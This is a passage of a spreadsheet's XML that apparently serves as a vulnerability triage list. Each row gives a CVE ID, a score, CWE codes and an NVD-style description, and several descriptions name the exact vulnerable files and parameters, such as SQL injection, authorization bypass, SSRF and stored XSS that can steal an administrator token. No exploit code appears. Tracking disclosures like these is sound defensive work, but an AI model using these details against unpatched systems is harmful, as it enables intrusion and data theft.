          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86225</t>
        </is>
      </c>
      <c r="C1870" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1870" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1870" s="5" t="inlineStr"/>
      <c r="F1870" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1870" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H1870" s="5" t="inlineStr"/>
      <c r="I1870" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1870" s="5" t="inlineStr"/>
      <c r="K1870" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L1870" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SourceCodester Class and Exam Timetabling System 1.0. Affected by this vulnerability is the function mysqli_query of the file /admin/modal_add_room.php. The manipulation of the argument room_name leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="M1870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86225</t>
        </is>
      </c>
    </row>
    <row r="1871">
      <c r="A1871" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86260</t>
        </is>
      </c>
      <c r="C1871" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1871" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1871" s="5" t="inlineStr"/>
      <c r="F1871" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1871" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1871" s="5" t="inlineStr"/>
      <c r="I1871" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1871" s="5" t="inlineStr"/>
      <c r="K1871" s="5" t="inlineStr">
        <is>
          <t>CWE-620, CWE-640</t>
        </is>
      </c>
      <c r="L1871" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in sfturing hosp_order up to 627f426331da8086ce8fff2017d65b1ddef384f8. The affected element is the function modifyPassWord of the file ssm_pro/src/main/java/cn/sfturing/web/CommonUserController.java of the component Password Recovery. Performing a manipulation results in unverified password change. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86260</t>
        </is>
      </c>
    </row>
    <row r="1872">
      <c r="A1872" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86261</t>
        </is>
      </c>
      <c r="C1872" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1872" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1872" s="5" t="inlineStr"/>
      <c r="F1872" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1872" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1872" s="5" t="inlineStr"/>
      <c r="I1872" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1872" s="5" t="inlineStr"/>
      <c r="K1872" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L1872" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in sfturing hosp_order up to 627f426331da8086ce8fff2017d65b1ddef384f8. The impacted element is an unknown function of the file ssm_pro/src/main/java/cn/sfturing/web/OrderController.java of the component Order Controller. Executing a manipulation of the argument userIdenf can lead to authorization bypass. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86261</t>
        </is>
      </c>
    </row>
    <row r="1873">
      <c r="A1873" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86262</t>
        </is>
      </c>
      <c r="C1873" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1873" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1873" s="5" t="inlineStr"/>
      <c r="F1873" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1873" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1873" s="5" t="inlineStr"/>
      <c r="I1873" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1873" s="5" t="inlineStr"/>
      <c r="K1873" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L1873" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in sfturing hosp_order up to 627f426331da8086ce8fff2017d65b1ddef384f8. This affects the function updateOrderSta1/updateOrderdiseaseInfo of the file ssm_pro/src/main/java/cn/sfturing/web/OrderController.java of the component Order Handler. The manipulation of the argument userID/id leads to authorization bypass. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86262</t>
        </is>
      </c>
    </row>
    <row r="1874">
      <c r="A1874" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86263</t>
        </is>
      </c>
      <c r="C1874" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1874" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1874" s="5" t="inlineStr"/>
      <c r="F1874" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1874" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1874" s="5" t="inlineStr"/>
      <c r="I1874" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1874" s="5" t="inlineStr"/>
      <c r="K1874" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L1874" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in sfturing hosp_order up to 627f426331da8086ce8fff2017d65b1ddef384f8. This impacts the function orderRecordsService.cancelOrder of the file ssm_pro/src/main/java/cn/sfturing/web/OrderController.java of the component Order Cancellation. The manipulation of the argument ID results in authorization bypass. The attack may be performed from remote. The exploit is now public and may be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86263</t>
        </is>
      </c>
    </row>
    <row r="1875">
      <c r="A1875" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86273</t>
        </is>
      </c>
      <c r="C1875" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1875" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1875" s="5" t="inlineStr"/>
      <c r="F1875" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1875" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1875" s="5" t="inlineStr"/>
      <c r="I1875" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1875" s="5" t="inlineStr"/>
      <c r="K1875" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1875" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in projeto-siga siga up to 11.1.1. Affected by this issue is the function DownloadExterno.getUrl of the file sigaex/src/main/java/br/gov/jfrj/siga/vraptor/ExUtilController.java of the component HTML-to-PDF Endpoint. This manipulation of the argument html causes server-side request forgery. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86273</t>
        </is>
      </c>
    </row>
    <row r="1876">
      <c r="A1876" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86274</t>
        </is>
      </c>
      <c r="C1876" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1876" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1876" s="5" t="inlineStr"/>
      <c r="F1876" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1876" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1876" s="5" t="inlineStr"/>
      <c r="I1876" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1876" s="5" t="inlineStr"/>
      <c r="K1876" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L1876" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in projeto-siga siga up to 11.0.2.10/11.0.2.13/11.1.1. This affects the function ExAutenticacaoController.autenticar of the file sigaex/src/main/java/br/gov/jfrj/siga/vraptor/ExAutenticacaoController.java of the component Authentication Flow. Such manipulation of the argument cod/jwt leads to missing authorization. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86274</t>
        </is>
      </c>
    </row>
    <row r="1877">
      <c r="A1877" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86282</t>
        </is>
      </c>
      <c r="C1877" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1877" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1877" s="5" t="inlineStr"/>
      <c r="F1877" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1877" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1877" s="5" t="inlineStr"/>
      <c r="I1877" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1877" s="5" t="inlineStr"/>
      <c r="K1877" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L1877" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in jaychouchannel Tourism-Management-System up to 8122bf020d91199eddfff3ee02d1632a70a9a132. Affected is an unknown function of the file travel/src/main/java/com/controller/CommonController.java of the component CommonDao. Executing a manipulation of the argument table/column/xColumn/yColumn can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. This patch is called d44ec3aa0bd2a72c8800e3befb0a9a96a6491b86. A patch should be applied to remediate this issue.</t>
        </is>
      </c>
      <c r="M1877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86282</t>
        </is>
      </c>
    </row>
    <row r="1878">
      <c r="A1878" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86284</t>
        </is>
      </c>
      <c r="C1878" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1878" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1878" s="5" t="inlineStr"/>
      <c r="F1878" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1878" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1878" s="5" t="inlineStr"/>
      <c r="I1878" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1878" s="5" t="inlineStr"/>
      <c r="K1878" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="L1878" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in jaychouchannel Tourism-Management-System up to 8122bf020d91199eddfff3ee02d1632a70a9a132. Affected by this vulnerability is the function getOption of the file travel/src/main/java/com/controller/CommonController.java. The manipulation of the argument tableName/columnName leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The identifier of the patch is d44ec3aa0bd2a72c8800e3befb0a9a96a6491b86. To fix this issue, it is recommended to deploy a patch.</t>
        </is>
      </c>
      <c r="M1878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86284</t>
        </is>
      </c>
    </row>
    <row r="1879">
      <c r="A1879" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86318</t>
        </is>
      </c>
      <c r="C1879" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1879" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1879" s="5" t="inlineStr"/>
      <c r="F1879" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1879" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1879" s="5" t="inlineStr"/>
      <c r="I1879" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1879" s="5" t="inlineStr"/>
      <c r="K1879" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="L1879" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in java-json-tools json-patch up to 1.13. Affected is the function JsonMergePatch.fromJson of the file JsonMergePatchDeserializer.java. Executing a manipulation can lead to stack-based buffer overflow. The attack may be performed from remote. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86318</t>
        </is>
      </c>
    </row>
    <row r="1880">
      <c r="A1880" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86319</t>
        </is>
      </c>
      <c r="C1880" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1880" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1880" s="5" t="inlineStr"/>
      <c r="F1880" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1880" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1880" s="5" t="inlineStr"/>
      <c r="I1880" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1880" s="5" t="inlineStr"/>
      <c r="K1880" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="L1880" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in java-json-tools json-patch up to 1.13. Affected by this vulnerability is the function JsonPatch.apply of the file src/main/java/com/github/fge/jsonpatch/JsonPatch.java of the component Patch Operation Handler. The manipulation leads to resource consumption. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86319</t>
        </is>
      </c>
    </row>
    <row r="1881">
      <c r="A1881" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86321</t>
        </is>
      </c>
      <c r="C1881" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1881" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1881" s="5" t="inlineStr"/>
      <c r="F1881" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1881" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1881" s="5" t="inlineStr"/>
      <c r="I1881" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1881" s="5" t="inlineStr"/>
      <c r="K1881" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1881" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in java-json-tools jackson-coreutils 2.0. Affected by this issue is the function JsonLoader.fromURL of the file src/main/java/com/github/fge/jackson/JsonLoader.java of the component URL Validation. The manipulation results in server-side request forgery. It is possible to launch the attack remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86321</t>
        </is>
      </c>
    </row>
    <row r="1882">
      <c r="A1882" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86511</t>
        </is>
      </c>
      <c r="C1882" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1882" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1882" s="5" t="inlineStr"/>
      <c r="F1882" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1882" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1882" s="5" t="inlineStr"/>
      <c r="I1882" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1882" s="5" t="inlineStr"/>
      <c r="K1882" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="L1882" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in java-json-tools jackson-coreutils 2.0. Affected by this vulnerability is the function BigDecimal.toPlainString of the file src/main/java/com/github/fge/jackson/JacksonUtils.java. Performing a manipulation results in resource consumption. The attack may be initiated remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86511</t>
        </is>
      </c>
    </row>
    <row r="1883">
      <c r="A1883" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86513</t>
        </is>
      </c>
      <c r="C1883" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1883" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1883" s="5" t="inlineStr"/>
      <c r="F1883" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1883" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1883" s="5" t="inlineStr"/>
      <c r="I1883" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1883" s="5" t="inlineStr"/>
      <c r="K1883" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L1883" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in java-json-tools jackson-coreutils 2.0. This vulnerability affects the function TreePointer.tokensFromInput of the file src/main/java/com/github/fge/jackson/jsonpointer/TreePointer.java of the component JSON Pointer parser. The manipulation results in allocation of resources. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86513</t>
        </is>
      </c>
    </row>
    <row r="1884">
      <c r="A1884" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86672</t>
        </is>
      </c>
      <c r="C1884" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1884" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1884" s="5" t="inlineStr"/>
      <c r="F1884" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1884" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H1884" s="5" t="inlineStr"/>
      <c r="I1884" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1884" s="5" t="inlineStr"/>
      <c r="K1884" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="L1884" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected is an unknown function of the file example.7z of the component Backup Handler. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86672</t>
        </is>
      </c>
    </row>
    <row r="1885">
      <c r="A1885" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86673</t>
        </is>
      </c>
      <c r="C1885" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1885" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1885" s="5" t="inlineStr"/>
      <c r="F1885" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1885" s="5" t="inlineStr">
        <is>
          <t>f5, mysql</t>
        </is>
      </c>
      <c r="H1885" s="5" t="inlineStr"/>
      <c r="I1885" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1885" s="5" t="inlineStr"/>
      <c r="K1885" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="L1885" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this issue is the function mysqli_connect of the file config/database.php of the component Database Connection. This manipulation causes hard-coded credentials. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86673</t>
        </is>
      </c>
    </row>
    <row r="1886">
      <c r="A1886" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88055</t>
        </is>
      </c>
      <c r="C1886" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1886" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1886" s="5" t="inlineStr"/>
      <c r="F1886" s="5" t="inlineStr"/>
      <c r="G1886" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1886" s="5" t="inlineStr"/>
      <c r="I1886" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1886" s="5" t="inlineStr"/>
      <c r="K1886" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1886" s="5" t="inlineStr">
        <is>
          <t>AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. In 1.16.1 and earlier, the manager role can store meta_page_title or meta_page_favicon through /api/admin/system-preferences, and MetaGenerator inserts those values into production homepage HTML without escaping attribute values or text content. The values pass unchanged through server/models/systemSettings.js and reach MetaGenerator.generate() in server/index.js. #assembleMeta() in server/utils/boot/MetaGenerator.js concatenates the stored values into HTML. When an administrator visits the homepage /, injected JavaScript can read the administrator JWT and use it to create API keys, access or modify workspace and chat data, delete users, and perform other administrator actions. server/endpoints/admin.js accepts the manager-controlled settings before server/models/systemSettings.js returns them unchanged. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="M1886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88055</t>
        </is>
      </c>
    </row>
    <row r="1887">
      <c r="A1887" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1887" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-26961</t>
        </is>
      </c>
      <c r="C1887" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1887" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1887" s="5" t="inlineStr"/>
      <c r="F1887" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1887" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1887" s="5" t="inlineStr"/>
      <c r="I1887" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1887" s="5" t="inlineStr"/>
      <c r="K1887" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1887" s="5" t="inlineStr">
        <is>
          <t>Italtel NetMatch-S 5.0.0-20200703 allows Multiple Stored XSS under NP_IBCF-NATUP-01/NMSCI-WebGui/backup_restore.jsp and NP_IBCF-MIBER-03/NMSCI-WebGui/storage.jsp via the name parameter. A malicious user leveraging this vulnerability could inject arbitrary JavaScript. The malicious payload will then be triggered every time an authenticated user browses the page containing it.</t>
        </is>
      </c>
      <c r="M1887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-26961</t>
        </is>
      </c>
    </row>
    <row r="1888">
      <c r="A1888" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1888" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-11831</t>
        </is>
      </c>
      <c r="C1888" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1888" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1888" s="5" t="inlineStr"/>
      <c r="F1888" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1888" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1888" s="5" t="inlineStr"/>
      <c r="I1888" s="5" t="inlineStr">
        <is>
          <t>2025-02-10</t>
        </is>
      </c>
      <c r="J1888" s="5" t="inlineStr"/>
      <c r="K1888" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1888" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.</t>
        </is>
      </c>
      <c r="M1888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-11831</t>
        </is>
      </c>
    </row>
    <row r="1889">
      <c r="A1889" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1889" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64542</t>
        </is>
      </c>
      <c r="C1889" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1889" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1889" s="5" t="inlineStr"/>
      <c r="F1889" s="5" t="n">
        <v>0.002</v>
      </c>
